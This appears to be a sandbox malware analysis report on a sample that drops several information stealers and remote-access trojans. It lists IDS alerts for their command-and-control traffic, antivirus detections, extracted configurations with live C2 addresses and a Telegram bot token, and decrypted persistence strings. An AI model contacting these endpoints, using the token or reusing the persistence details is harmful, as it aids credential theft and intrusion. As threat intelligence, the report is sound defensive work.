2025-02-07T17:46:43.843372+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50081	172.67.139.208	443	TCP
2025-02-07T17:46:45.039732+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50084	172.67.139.208	443	TCP
2025-02-07T17:46:45.754435+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50085	172.67.139.208	443	TCP
2025-02-07T17:46:46.476300+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50086	172.67.139.208	443	TCP
2025-02-07T17:46:47.710563+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50090	172.67.139.208	443	TCP
2025-02-07T17:46:47.801876+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50091	172.67.139.208	443	TCP
2025-02-07T17:46:49.197079+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50092	172.67.139.208	443	TCP
2025-02-07T17:46:51.019669+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50094	172.67.139.208	443	TCP
2025-02-07T17:46:53.804202+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50104	172.67.139.208	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:53.152800+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.6	50233	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:13.728534+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49871	185.215.113.43	80	TCP
2025-02-07T17:46:18.479808+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49906	185.215.113.43	80	TCP
2025-02-07T17:46:23.191420+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49941	185.215.113.43	80	TCP
2025-02-07T17:46:31.437752+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50015	185.215.113.43	80	TCP
2025-02-07T17:46:35.834475+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50055	185.215.113.43	80	TCP
2025-02-07T17:46:39.749126+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50069	185.215.113.43	80	TCP
2025-02-07T17:46:43.470111+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50079	185.215.113.43	80	TCP
2025-02-07T17:46:52.202403+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50097	185.215.113.43	80	TCP
2025-02-07T17:46:56.502335+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50126	185.215.113.43	80	TCP
2025-02-07T17:47:01.018961+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50156	185.215.113.43	80	TCP
2025-02-07T17:47:06.606903+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50187	185.215.113.43	80	TCP
2025-02-07T17:47:10.360464+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50198	185.215.113.43	80	TCP
2025-02-07T17:47:14.988531+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50206	185.215.113.43	80	TCP
2025-02-07T17:47:21.025820+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50218	185.215.113.43	80	TCP
2025-02-07T17:47:25.379240+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50222	185.215.113.43	80	TCP
2025-02-07T17:47:34.695282+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50225	185.215.113.43	80	TCP
2025-02-07T17:47:40.439474+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50228	185.215.113.43	80	TCP
2025-02-07T17:47:46.405503+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50230	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:58.227258+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.6	50233	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:29.406086+0100	2059907	1	Domain Observed Used for C2 Detected	192.168.2.6	58355	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:05.878466+0100	2059927	1	Domain Observed Used for C2 Detected	192.168.2.6	53486	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:16.268736+0100	2059931	1	Domain Observed Used for C2 Detected	192.168.2.6	61655	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:19.911381+0100	2044247	1	Malware Command and Control Activity Detected	5.75.214.119	443	192.168.2.6	49914	TCP
2025-02-07T17:48:01.253541+0100	2044247	1	Malware Command and Control Activity Detected	5.75.214.119	443	192.168.2.6	50255	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:21.575992+0100	2051831	1	Malware Command and Control Activity Detected	5.75.214.119	443	192.168.2.6	49926	TCP
2025-02-07T17:48:02.773833+0100	2051831	1	Malware Command and Control Activity Detected	5.75.214.119	443	192.168.2.6	50256	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:18.530754+0100	2049087	1	A Network Trojan was detected	192.168.2.6	49899	5.75.214.119	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:23.657679+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	49938	5.75.214.119	443	TCP
2025-02-07T17:46:24.574736+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	49947	5.75.214.119	443	TCP
2025-02-07T17:46:33.108151+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50028	5.75.214.119	443	TCP
2025-02-07T17:46:34.506935+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50049	5.75.214.119	443	TCP
2025-02-07T17:46:35.571547+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50054	5.75.214.119	443	TCP
2025-02-07T17:46:37.082035+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50061	5.75.214.119	443	TCP
2025-02-07T17:46:38.980916+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50065	5.75.214.119	443	TCP
2025-02-07T17:46:59.945537+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50142	5.75.214.119	443	TCP
2025-02-07T17:47:02.829546+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50177	5.75.214.119	443	TCP
2025-02-07T17:47:03.779196+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50182	5.75.214.119	443	TCP
2025-02-07T17:47:07.109115+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50189	5.75.214.119	443	TCP
2025-02-07T17:47:09.823675+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50195	5.75.214.119	443	TCP
2025-02-07T17:47:11.324447+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50199	5.75.214.119	443	TCP
2025-02-07T17:47:12.823473+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50203	5.75.214.119	443	TCP
2025-02-07T17:48:04.424102+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50257	5.75.214.119	443	TCP
2025-02-07T17:48:05.403983+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.6	50258	5.75.214.119	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:32.702296+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50024	172.67.139.208	443	TCP
2025-02-07T17:46:33.400393+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50035	104.21.80.1	443	TCP
2025-02-07T17:47:04.488602+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50183	104.21.80.1	443	TCP
2025-02-07T17:47:10.728910+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50197	172.67.150.254	443	TCP
2025-02-07T17:47:51.567696+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50237	172.67.150.254	443	TCP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:45:43.432109+0100	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.6	50286	192.248.189.11	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:05.964933+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49822	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:13.015555+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	49834	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:09.194383+0100	2803305	3	Unknown Traffic	192.168.2.6	49844	185.215.113.97	80	TCP
2025-02-07T17:46:14.474901+0100	2803305	3	Unknown Traffic	192.168.2.6	49874	185.215.113.97	80	TCP
2025-02-07T17:46:19.230250+0100	2803305	3	Unknown Traffic	192.168.2.6	49913	185.215.113.97	80	TCP
2025-02-07T17:46:23.917462+0100	2803305	3	Unknown Traffic	192.168.2.6	49948	185.215.113.97	80	TCP
2025-02-07T17:46:27.629513+0100	2803305	3	Unknown Traffic	192.168.2.6	49971	185.215.113.97	80	TCP
2025-02-07T17:46:32.331106+0100	2803305	3	Unknown Traffic	192.168.2.6	50023	185.215.113.97	80	TCP
2025-02-07T17:46:44.199842+0100	2803305	3	Unknown Traffic	192.168.2.6	50082	185.215.113.97	80	TCP
2025-02-07T17:46:47.842291+0100	2803305	3	Unknown Traffic	192.168.2.6	50089	185.215.113.16	80	TCP
2025-02-07T17:46:53.117759+0100	2803305	3	Unknown Traffic	192.168.2.6	50098	185.215.113.16	80	TCP
2025-02-07T17:47:01.747916+0100	2803305	3	Unknown Traffic	192.168.2.6	50167	185.215.113.97	80	TCP
2025-02-07T17:47:15.875212+0100	2803305	3	Unknown Traffic	192.168.2.6	50207	185.215.113.97	80	TCP
2025-02-07T17:47:26.328234+0100	2803305	3	Unknown Traffic	192.168.2.6	50223	185.215.113.97	80	TCP
2025-02-07T17:47:35.542672+0100	2803305	3	Unknown Traffic	192.168.2.6	50227	185.215.113.97	80	TCP
2025-02-07T17:47:41.415930+0100	2803305	3	Unknown Traffic	192.168.2.6	50229	185.215.113.97	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:48.170922+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.6	50233	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:53.556109+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.6	50233	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:58.234887+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.6	50233	103.84.89.222	33791	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:10.001827+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50196	104.21.80.1	443	TCP
2025-02-07T17:47:25.307079+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50221	172.67.150.254	443	TCP
2025-02-07T17:47:55.606143+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50245	172.67.150.254	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:34.506935+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50049	5.75.214.119	443	TCP
2025-02-07T17:46:35.571547+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50054	5.75.214.119	443	TCP
2025-02-07T17:46:37.082035+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50061	5.75.214.119	443	TCP
2025-02-07T17:47:02.829546+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50177	5.75.214.119	443	TCP
2025-02-07T17:47:03.779196+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50182	5.75.214.119	443	TCP
2025-02-07T17:47:07.109115+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50189	5.75.214.119	443	TCP
2025-02-07T17:47:09.823675+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50195	5.75.214.119	443	TCP
2025-02-07T17:47:11.324447+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50199	5.75.214.119	443	TCP
2025-02-07T17:47:12.823473+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.6	50203	5.75.214.119	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:17.197966+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.6	49891	5.75.214.119	443	TCP

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:38.481915+0100	2853685	1	A Network Trojan was detected	192.168.2.6	50063	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:53.627639+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:01.232201+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:07.875792+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:22.761823+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:31.239207+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:37.134640+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:59.885930+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:48:01.248431+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:48:14.108629+0100	2852870	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:53.664919+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP
2025-02-07T17:47:07.892826+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP
2025-02-07T17:47:22.805068+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP
2025-02-07T17:47:37.266743+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP
2025-02-07T17:47:59.924961+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP
2025-02-07T17:48:14.111698+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:01.232201+0100	2852874	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:47:31.239207+0100	2852874	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP
2025-02-07T17:48:01.248431+0100	2852874	1	Malware Command and Control Activity Detected	95.216.115.242	33333	192.168.2.6	50068	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:07.672372+0100	2853193	1	Malware Command and Control Activity Detected	192.168.2.6	50068	95.216.115.242	33333	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:38.481915+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	50063	149.154.167.220	443	TCP

Joe Security MALWARE Nymiam - C&C DLL Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:49.823743+0100	1800003	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C DLL Key Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:49.433320+0100	1800002	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Files Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:50.323411+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:47:52.637077+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:47:54.963959+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:47:57.328918+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:00.143904+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:02.443507+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:04.748211+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:07.025823+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:09.304462+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:11.615896+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:13.905669+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Software Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:48:17.371748+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP
2025-02-07T17:48:18.302460+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.6	50234	185.156.73.23	80	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:48.170922+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.6	50233	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://torpdidebar.com/s	Avira URL Cloud: Label: malware
Source: https://vikine.rest	Avira URL Cloud: Label: malware
Source: https://actiothreaz.com:443/apical	Avira URL Cloud: Label: malware
Source: https://vikine.rest/:&	Avira URL Cloud: Label: malware
Source: https://actiothreaz.com/apiX	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1VB7gm8[1].exe

Avira: detection malicious, Label: HEUR/AGEN.1314794

Found malware configuration

Source: 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "95.216.115.242"], "Port": 33333, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 23.2.uniq.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["actiothreaz.com", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "sX8RTW--googleanal"}
Source: RegAsm.exe.7496.27.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7567333742:AAHDfYPeN-w99Wqz2UqIryCqnJvB1iXUejw/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\af53YGc[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1VB7gm8[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\L65uNi1[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\uniq[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1070037001\uniq.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1070040001\7fOMOTQ.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1070041001\1VB7gm8.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1070052001\26dddb3c83.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1070053001\0fc5fe7282.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 54%			Perma Link
Source: random.exe	ReversingLabs: Detection: 50%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1VB7gm8[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\af53YGc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\MvowLGc[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
